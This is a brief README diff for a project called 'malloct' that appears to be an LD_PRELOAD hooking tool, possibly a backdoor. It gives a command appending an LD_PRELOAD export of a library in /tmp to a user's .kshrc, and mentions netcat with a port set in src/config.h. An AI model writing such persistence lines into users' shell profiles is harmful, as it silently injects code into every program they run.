kernelfucker/malloct/README.md

 $ echo "export LD_PRELOAD=/tmp/libmalloct.so" >> /home/$USER/.kshrc

-\# set to which shell you are using
+> set to which shell you are using

+> you can set to the program you will use

 # nc
 **you can set custom port in src/config.h**